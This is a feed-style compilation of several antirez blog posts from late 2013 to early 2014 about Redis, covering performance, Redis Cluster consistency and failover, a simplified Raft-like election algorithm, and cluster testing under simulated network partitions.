Why is it so great to hack a small piece of code? Yes is small and simple, those are two good points. It can be totally understood, dominated. You can use smartness since little code is the only place of the world where coding smartness will pay off, since in large projects obviousness is far better in the long run. However I believe there is more than that, and is that small programs can be perfect. As perfect as a sonnet composed of a few words. The limits in size and in scope, constitute an intellectual stratagem to avoid the “it may be better" trap, when this better is not actually measurable and evident. Under these strict limits, what the program does is far more interesting than what it does not. Actually the constraints are the more fertile ground for creativity of the solutions, otherwise likely useless: at scale there is always a more correct, understood, canonical way to do everything.

There is an interview of Bill Gates in the first years of the Microsoft experience where he describes this feeling when writing the famous Microsoft BASIC interpreter. The limits were the same we self impose today to ourselves for fun, in the contests, or just for the sake of it. There was a generation of programmers that was able to experience perfection in their creations, where it was obvious to measure and understand if a change actually lead to an improvement of the program or not, in a territory where space and time were so scarse. There was no room for wastes and not needed complexity.

Today’s software is in some way the triumph of the other reality of software: layers of complexities that gave use incredible devices or infrastructure technologies that in the hands of non experts leverage a number of possibilities. However maybe there is still something to preserve from the ancient times where software could be perfect, the feeling that what you are creating has a structure and is not just a pile of code that works. If you zoom out enough, you’ll see your large program is actually quite small again, and at least at this scale, it should resemble perfection, or at least, aim at it. Comments]]>
http://antirez.com/news/74
What is performance? http://antirez.com/news/73 http://antirez.com/news/73 Fri, 28 Feb 2014 13:30:42 +0000
A good starting point is probably the first slide I use lately in my talks about Redis. This first slide is indeed about performance, and says that performance is mainly three different things.

1) Latency: the amount of time I need to get the reply for a query.

2) Operations per unit of time per core: how many queries (operations) the system is able to reply per second, in a given reference computational unit?

3) Quality of operations: how much work those operations are able to accomplish?

Latency


This is probably the simplest component of performance. In many applications it is desirable that the time needed to get a reply from the system is small. However while the average time is important, another concern is the predictability of the latency figure, and how much difference there is between the average case and the worst case. When used well, in-memory systems are able to provide very good latency characteristics, and are also able to provide a consistent latency over time.

Operations per second per core


The second component I’m enumerating is what makes the difference between raw performance and scalability. We are interested in the amount of work the system is able to do, in a given unit of time, for a given reference computational unit. Linearly scalable systems can reach a big number of operations per second by using a number of nodes, however this means they are scalable, and not necessarily performant.

Operations per second per core is also usually bound to the amount of queries you can perform per watt, so to the energy efficiency of the system.

Quality of operations


The last point, while probably not as stressed among developers as throughput and latency, is really important in certain kind of systems, especially in-memory systems.

A system that is able to perform 100 operations per second, but with operations of “poor quality” (for example just GET and SET in Redis terms) has a lower performance compared to a system that is also able to perform an INCR operation with the same latency and OPS characteristics.
For instance, if the problem at hand is to increment counters, the former system will require two operations to increment a counter (we are not considering race conditions in this context), while the system providing INCR is able to use a single operation. As a result it is actually able to provide twice the performance of the former system.

As you can see the quality of operations is not an absolute meter, but depends on the kind of problem to solve. The same two systems if we want to cache HTML fragments are equivalent since the INCR operation would be useless.

The quality of operations is particularly important in in-memory systems, since usually the computation itself is negligible compared to the time needed to receive, dispatch the command, and create a reply, so systems like Redis with a rich set of operations are able to provide better performance in many contexts almost for free, just allowing the user to do more with a single operation. The “do more” part can actually mean a lot of things: either provide a reply to a more complex question, like for example the ZRANK command of Redis, or simply being able to provide a more *selective* reply, like HMGET command that is able to provide information just for a subset of the fields composing an Hash value, reducing the amount of bandwidth required between the server and its clients.

In general quality of operations don't only affect performances because they give less or more value to the operations per second the system is able to perform: operations quality also directly affect latency, since more complex operations are able to avoid back and forth data transfer between clients and servers required to mount multiple simpler operations into a more complex computation.

Conclusion


I hope that this short exploration of what performance is uncovered some of the complexities involved in the process of evaluating the capabilities of a database system from this specific point of view. There is a lot more to say about it, but I found that the above three components of the performance are among the most interesting and important when evaluating a system and when there is to understand how to evolve an existing system to improve its performance characteristics.

Thanks to Yiftach Shoolman for feedbacks about this topic. Comments]]>
http://antirez.com/news/73
Happy birthday Redis! http://antirez.com/news/72 http://antirez.com/news/72 Wed, 26 Feb 2014 09:19:41 +0000
I’m a bit shocked I worked for five years straight to the same thing. The opportunities for learning new things I had because of the directions where Redis pushed me, and the opportunities to learn new things that I missed because I had almost consistently no time for random hacking, are huge.

My feeling today is that the Redis project was possible because of the great coders I encountered in my journey: they made Redis popular adopting it in its infancy, since great coders don’t follow the hype. Great coders provided outstanding additions to Redis in the form of patches and ideas that were able to surpass my instinct to be conservative when the topic was to extend the system or accept external contributions. More great coders made possible to sponsor Redis when it was in its infancy, recognizing that there was something interesting about it, and more great coders applied it in the right way to solve problems in the course of many years, wrote an incredible ecosystem of client libraries and tools, and helped other coders to apply it when it was not clear what was the best way to solve a given problem.

The Redis community is outstanding because in some way it managed to attract a number of great coders.

I learned that in the future, whatever I’ll do more coding or I’ll be in a team to build something great in a different role, my top priority will be to stay with great coders, and I learned that they are not easy to recognize at first: their abilities don’t correlate with the number of followers on Twitter nor with the number of Github repositories. You have to discover great coders one after the other, and the biggest gift that Redis provided to me, was to get exposed to many of them.

In the course of five years there was also time, for me, to evolve my idea of what Redis is. The idea I’ve of Redis today is that its contribution should be to try to explore corner designs and bizzarre ideas. After all there are large teams of people much smarter than me trying to work on the hard problems applying the best technologies available.

Redis will continue to be a small research in more obscure places of the design space. After all I’ve the feeling that it helped to popularize certain non obvious ideas, like using data structures as data model for key value stores and caches, or that it is possible to apply scripting to database systems in a different way than stored procedures.

However for Redis to be able to do this research, I should be ready to be opinionated and change development direction when something is weak. This was done in the past, deprecating swap and diskstore, but should be done even more in the future.

Moreover Redis should be able to purse different goals at the same time: once Redis 3.0 will be stable, the design of Redis Cluster is conceived in order to leave my hands free about changes in the data model, without too much limits or compromises. This will result in a Redis 3.2 release that will focus again on the API, stressing one of the initial and fundamental aspects of Redis: caching, data model and computation.

It is entirely not obvious to me, after five years, to consider the Redis journey still ongoing, and I’m happy about it, because my motivations are not investors or shares, nor that I’m particularly in love with Redis as a project. If something new appears tomorrow that marginalizes Redis and makes it totally useless I’ll be very happy to start some new gig, after all this is how technology works: for cycles. And, after all, starting from scratch with something new is always exciting. However currently I believe there is more to do about Redis, and I’ll be happy to continue my work on it in the next weeks.

[1] https://news.ycombinator.com/item?id=494649 Comments]]>
http://antirez.com/news/72
A simple distributed algorithm for small idempotent information http://antirez.com/news/71 http://antirez.com/news/71 Fri, 21 Feb 2014 11:40:01 +0000 The algorithm is useful when you need to take some kind of information synchronized among a number of processes.
The information can be everything as long as it is composed of a small number of bytes, and as long as it is idempotent, that is, the current value of the information does not depend on the previous value, and we can just replace an old value, with the new one.

The size of the information is important because for the way the algorithm works, the information should be small enough that every node can broadcast it from time to time to some other random node, so it should fit the size of an “heartbeat” packet. Let’s say that up to a few kbytes everything is fine.

This algorithm is no new in any way, it is basically just a trivial way to put together obvious ideas found in other distributed algorithms in a simple way. However the algorithm is very useful in many real-world contexts, and is extremely simple to implement. The algorithm is mostly borrowed from Raft, however because of the premises it uses only a subset of Raft that is trivial to implement.

An example scenario
===

To understand better the algorithm, it is much better to have an example of problem that we want to solve in our distributed system.
Let’s say that we have N processes connected with two kind of wifi networks: a very reliable but slow wireless network, that is only suitable to send “control” packets like heartbeats or other low bandwidth data, and a very fast wireless network.

Now let’s imagine that while the slow network works at a fixed frequency, the high speed wireless network requires to adapt to changing conditions and noises in a given frequency, and is able to hop to a different frequency as soon as too much noise is detected.

We need a way to make sure that all the processes use the same frequency to communicate with the high speed network, and we also need a way to switch frequency when the currently used frequency has issues. We need this system to work if there are network partitions in the slow network, as long as the majority of the processes are able to communicate.

Note that this problem has the properties stated above:

1) The information is idempotent, if the high speed network switched to an different frequency, the new frequency does not depend on the old frequency. A process receiving the new frequency can just update frequency regardless of the fact that its old frequency was updated, or an older one (because for some reason it did not received some update).

2) The information is small, it is possible to propagate it easily across nodes in a small data packet. In this case it is actually extremely small, for example the frequency may be encoded in a 64 bit integer.

Epochs and update messages
===

The basic idea of this algorithm is that there is an artificial notion of time across the processes, that is used to order events or informations without to resort to the system time of the process, that is hard to synchronize between them.
This artificial time is called the “epoch”. Every process has the notion of currentEpoch, that is, initialized at zero at startup.
Every time a process sees an epoch that is greater that its current epoch, it updates its epoch to match the observed epoch.

Every process has also the notion of the frequencyEpoch, that is, the version of the currently used frequency.

In order to propagate the information, every process periodically sends an update message to some other process. For example every 5 seconds every process picks a random process, and sends to it an update message containing: the current frequency in use, the epoch of the frequency used, and the currentEpoch of the process sending the update message.

The first time a process is created its frequency is set to -1: this means that there is no frequency currently in use from the point of view of a given process, and that another one must be picked.

Updating the frequency
===

When a process receives an update message from another process containing a frequency with a frequencyEpoch that is greater than its local frequencyEpoch, it updates its frequency to the received value, and sets the frequencyEpoch to the received value as well.

In general when the currentEpoch or the frequency and frequencyEpoch are modified, the process writes this change to the disk or other permanente storage, so that when the process is restarted it will use the latest known information.

Choosing a frequency
===

A process requires to choose a frequency in two different scenarios:

1) When the current frequency is detected to be noisy.
2) When the current frequency is set to -1 (at startup).

In order to choose a frequency, a process requires to win an election.

This is how it works:

1) The process increments its own currentEpoch, and writes it to permanent storage. It also selects a suitable new frequency.

2) The process sends to all the other processes a ELECT_ME packet to get the vote of the other processes. The ELECT_ME packet contains the currentEpoch of the sending process.

3) The other processes will reply with YOU_HAVE_MY_VOTE packet only if their currentEpoch is not greater compared to the one of the process requesting the vote (it can’t be smaller, since the reception of the ELECT_ME packet will cause an older currentEpoch to be updated to match the one of the incoming packet). The YOU_HAVE_MY_VOTE packet contains the currentEpoch of the voting process.

4) A given process only votes a single time for a given epoch, so it takes a variable called lastVoteEpoch, and will only provide its vote if the currentEpoch in the request for the vote is greater (>) than lastVoteEpoch. When the vote is provided, lastVoteEpoch is updated (and stored on disk *before* the vote is provided, so that a crash and restart will not cause this process to vote again for the same epoch).

5) YOU_HAVE_MY_VOTE messages with a currentEpoch smaller than the currentEpoch of the process that requested the vote are discarded.

6) The process requesting the vote will consider itself elected only if it receives the majority of the votes from the other processes (it will count itself as a voter and will vote for itself when the election starts). If the process is elected it will updated its frequencyEpoch and frequency variables. The frequencyEpoch that will be used is the epoch the process requested the vote with, that is, its currentEpoch at the time it sent the ELECT_ME packets, just after the increment.

Given that a process requires to be elected to change the frequency, and that every process votes a single time in a given epoch, there must be only a single winner for a given epoch.

If a given process is not able to get elected as the majority is not reached, it will try again after a random delay. This delay must be greater compared to the latency of the slow network that is used to exchange these messages (see the Raft paper for more information about this). Every process will consider the election aborted after some time that is smaller than the retry time.

Propagating the new information
===

When a process wins an election, it updates its frequency value and frequencyEpoch to the new one, so by sending UPDATE messages, eventually all the other processes will receive the update as well and will switch to the new frequency.

If some process is partitioned away, it will receive the update as soon as the partition heals.

However it is a good idea to broadcast an UPDATE message to all the processes ASAP as soon as a process changes the frequency, so that all the other nodes will switch ASAP.

Improving the algorithm with a simple change
===

The ELECT_ME packet can be improved by adding the value of the frequencyEpoch, so that other processes will refuse to vote if the process has a stale information. This may happen when, for example, the process was partitioned away for some time with an old frequency that does not work well as there is too much noise. So in a minority partition, it may try to get elected again and again. The majority probably already switched to a newer frequency.

When the partition heals, the process may get elected and change the frequency to something else before having the chance to receive the updated frequency, causing a useless frequency switch. By adding the frequencyEpoch in the ELECT_ME packet and by making other processes checking that the info is updated before providing the vote, we avoid this problem.

Other improvements
===

Another improvement may be to only provide the vote if the current frequency, from the point of view of the receiving node, is *really* noisy. This avoids that a single node having hardware issues in the high bandwidth radio will be able to continuously switch to new frequencies since every frequency will be detected as noisy. In this way a frequency switch can happen only if the majority of the nodes are detecting an issue with the current frequency.

Similarly the node sending ELECT_ME messages to get elected may include the frequency it want to switch to, and the receiving node may vote only if the selected frequency passes some test and is considered a good pick, however this may affect the liveness of the algorithm: different nodes may believe that different frequencies are not a good pick so that majority can’t be reached.

Conclusions
===

What I did in this blog post is just to take Raft, that is able to handle the complex problem of replicating a state machine across different processes in a consistent way, and simplify it in order to use it in a subset of problems where the state is a single value (or a set of values) that can just be updated in an idempotent way.

The resulting algorithm is trivial to implement in a robust way, and is good enough for a non trivial set of real world problems.

---------------------------------------

EDIT: I received some feedback via Twitter, and I think it is better to clarify what is the meaning of the above algorithm. The idea is to retain some safety under the specified scenario, where a replicated state machine is not needed, but still have a reasonable way to take a set of values synchronized across different processes. The goal is to provide, in exchange for the lack of functionality compared to Raft or Paxos, an algorithm that can be recalled by memory only without even reading a document. In this spirit my aim is to further simplify the above description of the algorithm without impacting the functionality.

Moreover as somebody that is trying to understand more about distributed programming, I see that while it is very simple without even being aware of it, to get involved in something that is a distributed system, as a normal programmer (given that everything is networked today), descriptions of trivial algorithms may be a way to get somewhat exposed to basic distributed concepts.

The next step is to learn a formal analysis tool and try to analyze the algorithm to provide a proof of safety / liveness. Comments]]>
http://antirez.com/news/71
Redis Cluster and limiting divergences. http://antirez.com/news/70 http://antirez.com/news/70 Mon, 20 Jan 2014 16:13:56 +0000
I believe that putting in perspective the simple ideas that Redis Cluster implements, in a more formal way, is an interesting exercise for the following reason: Redis Cluster is not a design that tries to achieve “AP” or “CP” of the CAP theorem, since for its goals CAP Availability and CAP Consistency are too hard goals to reach without sacrificing other practical qualities.

Once a design does not try to maximize what is theoretically possible, the design space becomes much larger, and the implementation main goal is to try to provide some Availability and some reasonable form of Consistency, in the face of other conflicting design requirements like asynchronous replication of data.

The goal of this article is to reply to the following question: how Redis Cluster, as an asynchronous system, tries to limit divergences between nodes?

Nodes divergence
===

One of the main problems with asynchronous systems is that a master accepting requests never actually knows in a given moment if it is still the authoritative master or a stale one. For example imagine a cluster of three nodes A, B, C, with one replica each, A1, B1, C1. When a master is partitioned away with some client, A1 may be elected in the other side as the new master, but A is not able, for every request processed, to verify with the other nodes if the request should be accepted or not. At best node A can get asynchronous acknowledges from replicas.

Every time this happens, two parallel time lines for the same set of data is created, one in A, and one in A1. In Redis Cluster there is no way to merge data as explained in [2], so you can imagine the merge function between A and A1 data set when the partition heals as just picking one time line between all the time lines created (two in this case).

Another case that creates different time lines is the replication process itself.

A master A may have three replicas A1, A2, A3. Because of the very concept of asynchronous replication, each of the slaves may represent a point in time in the past history of the time line of A. Usually since replication in Redis is very fast and has minimal delay, as data is transmitted to slaves at the same time as the reply is transmitted to the writing client, the time “delta” between A and the slaves is small. However slaves may be lagging for some reason, so it is possible that, for example, A1 is one second in the past.

Asynchronously replicated nodes can’t really avoid diverging, however there is no need for the divergence between replicas to be unbound. Actually systems allowing replicas to diverge in an uncontrolled way may be hard to use in practice, even when for use case does not requiring strong consistency, that is the target of Redis Cluster.

Putting bounds to divergence
===

Redis cluster uses a few heuristics in order to limit divergence of nodes. The algorithms employed are very simple, consisting merely on the following four rules that nodes follow.

1) When a master is isolated from the majority for node-timeout (that is the user configured time after a non responding node is considered to be failing by the failure detection algorithm), it stops accepting queries from clients. It is easy to see how this helps in practice: in the majority side of the cluster, no slave is able to get elected and replace the master before node-timeout has elapsed. However, after node-timeout time has elapsed, the isolated master knows that it is possible that a parallel history was created in the other side of the cluster, and this history will win over its history, so it stops accepting data that will be otherwise lost. This means that if a master is partitioned away together with one or more clients, the window for data loss is node-timeout, that is usually in the order of 500 — 1000 milliseconds. If the partition heals before node-timeout, no data loss happens as the master rejoins the cluster as master.

2) A related problem is, when a master is failing, how to pick the “best” history among the available histories for the same data (depending on the number of slaves). An algorithm is used in order to give an advantage to the slave with the most updated replication offset to be elected, that is, the slave that likely has the most recent data compared to the master that went down. However if the best slave fails to be elected the other slaves will try an election as well.

3) If you think at “2” you’ll see that actually this means that the divergence between a master and its slaves is unbound. A slave can be lagging for hours in theory. So actually there is another heuristic in use, consisting on slaves to don’t try to get elected at all if the last time they received data from the master is too much in the past. This maximum time is currently set to ten times node-timeout, however it will be user-configurable in the stable release of Redis Cluster. While usually the lag between master and slaves is in the sub-millisecond figure, this time limit ensures that the worst case scenario is the following:

- A slave is stopped/unavailable for just a little less than ten times node-timeout.
- Its master fails.
- At the same time the slave returns back available.

Rejoins went wrong
===

There is another failure mode that was worth covering in Redis Cluster as it is in some way a different instance of the same problems covered so far. What happens if a master rejoins the cluster after it was already failed over, and there are still clients with non updated configuration writing to it?

This may happens in two main ways: rejoining the majority after a partition, and restarting the process. The failure mode is conceptually the same, the master is not able to get a synchronous acknowledge from other replicas about every write, and the other nodes may take a few milliseconds before being able to reconfigure a node that just rejoined (the node is usually reconfigured with an UPDATE message as soon as it is detected to have a stale configuration: this usually happens immediately once the rejoining instance pings another node or sends a pong in reply to a ping).

Rejoins are handled with another heuristic:

4) When a node rejoins the majority, or is restarted, it waits a small time (but yet a few order of magnitudes bigger than the usual network latency), before accepting writes again, in order to maximize the probability to get reconfigured before accepting writes from clients with stale information.

History re-play
===

Some of the Redis data structures and operations are commutative. Obvious examples are INCR and SADD, the order of operations does not matter and eventually the Set or the counter will have the same exact value as long as all the operations are executed.

Because of this observation, and since Redis instances get asynchronous acknowledges from slaves about how much data was processed, it is possible for partitioned masters to remember commands sent by clients that are still not acknowledged by all the replicas.

This trick is able to improve data safety in a way similar to AP systems, but while in AP systems merging values is used, Redis Cluster would reply commands from clients instead.

I proposed this idea in a blog post [3] some time ago, however this is a practical example of what would happen implementing it in a next version of Redis Cluster:

- A master gets partitioned away with clients.
- Clients write to the master for node-timeout time.
- The master starts returning errors.
- In the majority side, a slave is elected as the new master.
- When the old master rejoins it is reconfigured as a replica of the new master.

So far this is the description of what happens currently. With node replying what would happen is that all the writes not acknowledged, from the time the partition is created, to the time the master starts to reply with errors, are accumulated. When the partition heals, as part of turning the old master into a slave, the old master would connect with the new master, and re-play the accumulated stream of commands.

How all this is tested?
===

Some time ago I wrote about what I use in order to test Redis Cluster [4]. The most valuable tool I found so far is a simple consistency-test that is part of the redis-rb-cluster project [5] (a Ruby Redis Cluster client). Basically stress testing the system is as simple as keeping the consistency test running, while simulating different partitions, restarts, and other failures in the cluster.

This test was so useful and is so simple to run, that I’m actually starting to think that everybody running a distributed database in production, whatever it is Cassandra or Zookeeper or Redis or whatever else, should keep a similar test running against the production system as a way to monitor what is happening.

Such tests are lightweight to run, they can be made to just set a few keys per second. However they can easily detect issues with the implementation or other unexpected consistency issues. Especially systems merging data that are at the same time always available, such as AP systems, have the tendency to “mask” bugs: it takes some luck to discover some consistency leak in real data sets. With a simple consistency test running instead it is possible to monitor how the system is behaving.

The following for example is the output of constency-test.rb running against my testing environment:

27523967 R (7187 err) | 27523968 W (7186 err) | 12 noack |

So I know that I read/wrote 27 million of times during my testing, and 12 writes that received no acknowledge were actually materialized inside the database.

Notes:

[1] https://groups.google.com/d/msg/redis-db/2laQRKBKkYg/ssaiQLhasNkJ
[2] http://antirez.com/news/67
[3] http://antirez.com/news/68
[4] http://antirez.com/news/69
[5] https://github.com/antirez/redis-rb-cluster Comments]]>
http://antirez.com/news/70
Some fun with Redis Cluster testing http://antirez.com/news/69 http://antirez.com/news/69 Wed, 18 Dec 2013 15:32:21 +0000
In order to perform some testing I assembled an environment like that:

* Hardware: 6 real computers: 2 macbook pro, 2 macbook air, 1 Linux desktop, 1 Linux tiny laptop called EEEpc running with a single core at 800Mhz.

* Network: the six nodes were wired to the same network in different ways. Two nodes connected via ethernet, and four over wifi, with different access points. Basically there were three groups. The computers connected with the ethernet had 0.3 milliseconds RTT, other two computers connected with a near access point were at around 5 milliseconds, and another group of two with another access point were not very reliable, sometime some packet went lost, latency spikes at 300-1000 milliseconds.

During the simulation every computer ran Partitions.tcl (http://github.com/antirez/partitions) in order to simulate network partitions three times per minute, lasting an average of 10 seconds. Redis Cluster was configured to detect a failure after 500 milliseconds, so these settings are able to trigger a number of failover procedures.

Every computer ran the following:

Computer 1 and 2: Redis cluster node + Partitions.tcl + 1 client
Computer 3 to 6: Redis cluster node + Partitions.tcl

The cluster was configured to have three masters and three slaves in total.

As client software I ran the cluster consistency test that is shipped with redis-rb-cluster (http://github.com/antirez/redis-rb-cluster), that performs atomic counters increments remembering the value client side, to detect both lost writes and non acknowledged writes that were actually accepted by the cluster.

I left the simulation running for about 24 hours, however there were moments where the cluster was completely down due to too many nodes being down.

The bugs
===

The first thing that happened in the simulation was, a big number of crashes of nodes… the simulation was able to trigger bugs that I did not noticed in the past. Also there were obvious mis-behavior due to the fact that one node, the eeepc one, was running a Redis server compiled with a 32 bit target. So in the first part of the simulation I just fixed bugs:

7a666ac Cluster: set n->slaves to NULL in clusterNodeResetSlaves().
fda91db Cluster: check link is valid before sending UPDATE.
f57bb36 Cluster: initialize todo_before_sleep flags to 0.
c70c0c6 Cluster: use proper type mstime_t for ping delay var.
7c1cbdc Cluster: use an hardcoded 60 sec timeout in redis-trib connections.
47815d3 Fixed clearNodeFailureIfNeeded() time type to mstime_t.
e88e6a6 Cluster: use long long for timestamps in clusterGenNodesDescription().

The above commits made yesterday are a mix of bugs reported by valgrind (for some part of the simulation there were nodes running over valgrind), crashes, and misbehavior of the 32 bit instance.

After all the above fixes I left the simulation running for many hours without being able to trigger any crash. Basically the simulation “payed itself” just for this bug fixing activity… more minor bugs were found during the simulation that I’ve yet to fix.

Behavior under partition
===

One of the important goals of this simulation was to test how Redis Cluster performed under partitions. While Redis Cluster does not feature strong consistency, it is designed in order to minimize write loss under some very common failure modes, and to contain data loss within a given max window under other failure modes.

To understand how it works and the failure modes is simple because the way Redis Cluster itself works is simple to understand and predict. The system is just composed of different master instances handling a subset of keys each. Every master has from 0 to N replicas. In the specific case of the simulation every master had just one replica.

The most important aspect regarding safety and consistency of data is the failover procedure, that is executed as follows:

* A master must be detected as failing, according to the configured “node timeout”. I used 500 milliseconds as node timeout. However a single node cannot start a failover if it just detects a master is down. It must receive acknowledgements from the majority of the master nodes in order to flag the node as failing.
* Every slave that flagged a node as failing will try to be elected to perform the failover. Here we use the Raft protocol election step, so that only a single slave will be able to get elected for a given epoch. The epoch will be used in order to version the new configuration of the cluster for the set of slots served by the old master.

Once a slave performs the failover it reclaims the slots served by its master, and propagates the information ASAP. Other nodes that have an old configuration are updated by the cluster at a latter time if they were not reachable when the failover happened.

Since the replication is asynchronous, and when a master fails we pick a slave that may not have all the master data, there are obvious failure modes where writes are lost, however Redis Cluster try to do things in order to avoid situations where, for example, a client is writing forever to a master that is partitioned away and was already failed over in the majority side.

So this are the main precautions used by Redis Cluster to limit lost writes:

1) Not every slave is a candidate for election. If a slaves detects its data is too old, it will not try to get elected. This in practical terms means that the cluster does not recover in the case where none of the slaves of a master are able to talk with the master for a long time, the master fails, the slave are available but have very stale data.
2) If a master is isolated in the minority side of the cluster, that means, it senses the majority of the other masters are not reachable, it stops accepting writes.

There are still things to improve in the heuristics Redis Cluster uses to limit data loss, for example currently it does not use the replication offset in order to give an advantage to the slave with the most fresh version of data, but only the “disconnection time” from the master. This will be implemented in the next days.

However the point was to test how these mechanisms worked in the practice, and also to have a way to measure if further improvements will lead to less data loss.

So this is the results obtained in this first test:

* 1000 failovers
* 8.5 million writes performed by each client
* The system lost 2000 writes.
* The system retained 800 not acknowledged writes.

The amount of lost writes could appears to be extremely low considered the number of failovers performed. However note that the test program ran by the client was conceived to write to different keys so it was very easy when partitioned into a minority of masters for the client to hit an hash slot not served by the reachable masters. This resulted into waiting for the timeout to occur before of the next write. However writing to multiple keys is actually the most common case of real clients.

Impressions
===

Running this test was pretty interesting from the point of view of the paradigm shift from Redis to Redis Cluster.
When I started the test there were the bugs mentioned above still to fix, so instances crashed from time to time, still the client was almost always able to write (unless there was a partition that resulted into the cluster not being available). This is an obvious result of running a cluster, but as I’m used to see a different availability patter with what is currently the norm with Redis, this was pretty interesting to touch first hand.

Another positive result was that the system worked as expected in many ways, for example the nodes always agreed about the configuration when the partitions healed, there was never a time in which I saw no partitions and the client not able to reach all the hash slots and reporting errors.

The failure detection appeared to be robust enough, especially the computer connected with a very high latency network, from time to time appeared to be down to a single node, but that was not enough to get the agreement from the other nodes, avoiding a number of useless failover procedures.

At the same time I noticed a number of little issues that must be fixed. For example at some point there was a power outage and the router rebooted, causing many nodes to change address. There is a built-in feature in Redis Cluster so that the cluster reconfigures itself automatically with the new addresses as long as there is a node that did not changed address, assuming every node can reach it.
This system worked only half-way, and I noticed that indeed the implementation was not yet complete.

Future work
===

This is just an initial test, and this and other tests will require to be the norm in the process of testing Redis Cluster.
The first step will be to create a Redis Cluster testing environment that will be shipped with the system and that the user can run, so it is possible that the cluster will be able to support a feature to simulate partitions easily.

Another thing that is worthwhile with the current test setup using partitions.tcl is the ability of the test client, and of Partitions.tcl itself, to log events. For example with a log of partitions and data loss events that has accurate enough timestamps it is possible to correlate data loss events with partitions setups.

If you are interested in playing with Redis Cluster you can follow the Redis Cluster tutorial here: http://redis.io/topics/cluster-tutorial Comments]]>
http://antirez.com/news/69
Redis as AP system, reloaded http://antirez.com/news/68 http://antirez.com/news/68 Wed, 11 Dec 2013 21:19:21 +0000
At the end of the work day I was reading about Redis as AP and merge operations on Twitter. At the same time I was having a private email exchange with Alexis Richardson (from RabbitMQ, and, my boss). Alexis at some point proposed that perhaps a way to improve safety was to asynchronously ACK the client about what commands actually were not received so that the client could retry. This seemed a lot of efforts in the client side, but somewhat totally opened my view on the matter.

So the idea is, we can't go for synchronous replication, but indeed we get ACKs from the replicas, asynchronous ACKS, specifically.
What about retaining all the writes not acknowledged into a buffer, and "re-play" them to the current master when the partition heals?
The window we need to require to take the log is very small if the ACKs are frequent enough (currently the frequency is 1 per second, but this could be more easily).
If we give up Availability after N times the window we can say, ok, no more room, we now start to reply with errors to queries.

The HUGE difference with this approach is that this works regardless of the size of values. There are also semantical differences since the stream of operations is preserved instead of the value itself, so there is more context. Think for example about INCR.

Of course this would not work for anything, but one could mark in the command table what command to reply and what to discard. SADD is an example of perfect command since the order of operations does not matter. DEL is likely something to avoid replying. And so forth. In turn if we reply against the wrong (stale) master, it will accumulate the commands and so forth. Details may vary, but this is the first thing that really makes a difference.

Probably many of you that are into eventually consistent databases know about the log VS merge strategies already, but I had to re-invent the wheel as I was not aware. This is the kind of feedback I expected in the Redis thread that I did not received.

Another cool thing about this approach is that it's pretty opt-in, it can be just a state in the connection. Send a command and the connection is of "safe" type, so all the commands sent will be retained and replayed if not acknowledged, and so forth.

This is not going to be in the first version of Redis Cluster as I'm more happy to ship ASAP the current design, but it is a solid incremental idea that could be applied later, so a little actual result into the evolution of the design. Comments]]>
http://antirez.com/news/68
The Redis criticism thread http://antirez.com/news/67 http://antirez.com/news/67 Mon, 09 Dec 2013 23:53:03 +0000
https://groups.google.com/forum/#!topic/redis-db/Oazt2k7Lzz4

The thread has reached 89 posts so far, probably one of the biggest threads in the history of the Redis google group.
The main idea was that critiques are a mix of pointless attacks, and truth, so to extract the truth from critiques can be a good exercise, it means to have some seed idea for future improvements from the part of the population that is not using or is not happy with your system.

There were a lot of arguments possible: threading, persistence model, API, security, and so forth, however the argument that received the most attention was Redis Cluster design and its tradeoffs. There are people that are not convinced by the proposed design since it does not provide strong Consistency nor Availability (“C” and “A” of CAP, not any random consistency or availability).

Instead it only provides some form of weaker consistency and some failure resistance. In this blog post I want to clarify why this is in my opinion the right choice for Redis.

Strong consistency requires synchronous replication, and depending on the failure models you want to handle, it also requires to fsync data on disk at every write, in order to cover failures like all the nodes in a single data center rebooting for a power outage.
Redis is what it is because the performance and latency characteristics, so a model like the above would not be Redis.

So Redis Cluster trades Consistency for performance. The tradeoff is that there are well defined failure modes where it is possible to lose writes, however the system is designed in order to minimize lost writes under certain assumptions.

The other property we give away is availability, because being available means, in order to have a decent consistency story, to merge values when partitions heals. Redis data model is not merge-friendly, Redis uses the fact that data representation is in memory to get an advantage and export rich data structures to the user that have practically no limits in the size of every single value, if not the available memory. So there are Redis deployments with just a few keys, with sorted set values of many million of elements, to implement leader boards of Facebook games, and stuff like that.

Merging huge and complex values is extremely hard and not very practical. Implementing the values in a way that makes merging more manageable would mean instead to forget the current performance at all.

So we trade Availability for a more powerful data model. We still have some degree of resistance to failures. Nodes can stop working and partitions can happen, and as long as there is the majority of master nodes up and at least a replica for each hash slot, the system is able to accept queries from clients.

I believe this is a perfectly acceptable design and is able to provide great performances with consistency and availability guarantees that are reasonable for many class of applications. To get an idea about how it is possible to lose writes you can read the Redis Cluster tutorial here: http://redis.io/topics/cluster-tutorial

Note that in the meantime Redis unstable got an implementation of synchronous replication. It is not capable of providing strong consistency alone, but it is able to improve the consistency guarantees that the system is able to provide for certain writes (less / hard to trigger failure modes). However I believe that most users want Redis for very high loads, so this feature will likely be not very used.

Why Redis Cluster?
===

The real goal of Redis Cluster is not to provide the coolest consistent or available system, its goal was to provide what Redis is, but distributed in many nodes with *automatic sharding*. That was the real trigger: users can’t reinvent again and again client-side sharding, something that can do this for you is very useful, especially if it is designed in a way that 100 nodes will provide the performances of a single instance multiplied by 100.

This is the main reason I want to see it working and deployed, because I believe it can make a huge difference for the Redis users.
Being it a distributed system it should also be operational friendly (that was another design goal), provide some resistance to failure, and easy to predict failure modes. So consistency and availability are automatically concerns and huge part of the tradeoffs to make of course.

I’m excited about Redis Cluster. I truly believe it will benefit many users.

Redis became what it is, this strange tool that many developers learned to live and to solve problems with, because I tried to never be dogmatic about the development process and the tradeoffs, sometimes extreme, to take.
For example the fact that Redis is probably the only top-used database system developed mostly by a single individual currently (at our max we were Pieter half-time and I full-time) is the result of this choices: I’m not magic, the only way to do it is to realize your limits and design and plan for them.

So, as long as there are users doing good work with it, the Redis experiment is here to stay. Ended the thread I’ll start with my usual routine, grab a coffee in the morning, sit in the front of my computer, and do the only thing I’m really good at: write some code.

Thanks everybody that took part to the thread. Probably I would not do it again, since it was more stressful than useful honestly, however sometimes odd things must be tried, and it feels great to don’t fear the critiques.

Write code and be free. Comments]]>
http://antirez.com/news/67
WAIT: synchronous replication for Redis http://antirez.com/news/66 http://antirez.com/news/66 Thu, 05 Dec 2013 09:50:33 +0000
The feature was extremely easy to implement because of previous work made. WAIT was basically a direct consequence of the new Redis replication design (that started with Redis 2.8). The feature itself is in a form that respects the design of Redis, so it is relatively different from other implementations of synchronous replication, both at API level, and from the point of view of the degree of consistency it is able to ensure.

